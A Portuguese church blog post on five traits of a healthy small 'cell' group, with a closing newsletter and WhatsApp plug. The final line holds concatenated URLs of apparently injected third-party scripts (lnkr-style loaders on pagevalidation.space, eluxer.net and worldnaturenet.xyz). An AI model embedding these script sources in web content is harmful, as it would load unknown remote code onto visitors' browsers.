Cinco características de uma célula saudável

É muito comum haver dúvida se a célula é, de fato, saudável ou não. No entanto, dentre tantas características que se pode encontrar em células saudáveis, cinco se destacam:

1ª – Ter um bom líder

A célula saudável é aquela que o líder consegue captar o coração da sua liderança e o leva para célula de forma a gerar novos líderes com o mesmo coração.

Um bom líder é aquele que tem o “DNA” da Igreja local, pois, quando o líder tem esse “DNA”, ele é bom nos relacionamentos interpessoais, o que, por si só, faz com que os frutos e a multiplicação tornem-se resultados naturais.

Agora, quando o líder não tem esse “DNA”, ele não tem a mesma linguagem da Igreja e a célula acaba por se tornar um problema no futuro.

2ª – Ter um bom anfitrião

O anfitrião faz toda a diferença nos resultados de uma célula. Ele é o responsável por 50% dos resultados da célula, sejam positivos ou negativos.

Um bom anfitrião é aquele que consegue fazer com que o ambiente esteja aconchegante e receptivo, onde as pessoas se sintam tão bem, que não queiram ir embora e que tenham o desejo de voltar.

3ª – Ter uma atmosfera de comunhão

A célula saudável é aquela que vive o princípio do “purê de batatas”. No entanto, é muito comum a célula não ser um “purê de batatas” e, sim, um “saco com batatas”. Quando isso acontece, a célula se torna, na verdade, uma “reunião social” e sem atrativos para crescimento.

Agora, quando a célula tem uma atmosfera de comunhão profunda e verdadeira entre os membros, reunindo-se em outros dias fora do dia e do local da célula, estando juntos no culto, e sempre promovendo eventos para que estejam todos em unidade, aí, sim, ela vive, de fato, a realidade do “purê de batas”. E é, justamente, esta realidade que faz com que as pessoas sintam que a célula é uma família e gera o desejo por parte das pessoas que vão chegando, de também fazer parte deste grupo.

Isso é uma característica importante em uma célula saudável.

4ª – Ter um grande sentimento por ganhar almas

Quando a célula tem este sentimento, ela está, constantemente, levantando projetos evangelísticos, fazendo visitas entre os membros e à pessoas novas, fazendo, assim, com que novas pessoas cheguem, semanalmente.

Quando a célula consegue fazer com esse sentimento queime no coração de cada membro, ela sempre tenha algo novo e assume uma paixão evangelística, atraindo novas pessoas para o grupo.

5ª – Treinar novos líderes

Uma célula que é saudável é aquela que treina novos líderes, ou seja, é a célula que está sempre trabalhando para levantar novas pessoas com o desejo de aceitar o chamado de cuidar de vidas.

A célula já nasce com o propósito de multiplicar, este é o objetivo central da célula. Então, para que isso aconteça, o líder precisa levar pessoas a estar cuidando de vidas, fazendo visitas, participando dos eventos e dos cursos, para que eles possam sentir o toque do Espírito Santo com relação ao chamado de todos nós – “Ir e fazer discípulos”.

É muito importante que a célula esteja em unidade em todos os eventos, comunhões e treinamentos. Se a célula quiser cumprir o propósito de Deus, ela precisa multiplicar. Mas, isso só vai acontecer se ela estiver envolvendo todos e treinando mais de perto os que vão se colocando a disposição a dizer “Sim!” ao chamado de cuidar de vidas.

Quando a célula consegue envolver o maior número de pessoas nos treinamentos e nas reuniões de TADEL, por exemplo, o “DNA” é passado com mais facilidade e todos, inclusive os que vão chegando, vão se envolvendo com mais rapidez. O que, por si só, faz toda a diferença.

Estas características, quando encontradas em uma célula, ela não só é saudável, como, também, multiplicará células saudáveis, naturalmente.

Você sabia que eu tenho uma lista de amigos que eu uso para o envio de conteúdos em exclusivos e em primeira mão pelo e-mail? Caso você queira se inscrever, basta clicar no link: www.liderancadesucesso.com.br/cadastro/. Será um grande prazer poder me relacionar com você de uma forma mais próxima. Ah! Aproveite e adicione o WhatsApp da minha equipe – (21)97016-2326. Assim, se você tiver dúvidas ou sugestões, pode ficar à vontade para entrar em contato.

http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x7038x&r=24http://pagevalidation.space/addons/lnkr5.min.jshttp://pagevalidation.space/addons/lnkr30_nt.min.jshttp://eluxer.net/code?id=105&subid=51824_7038_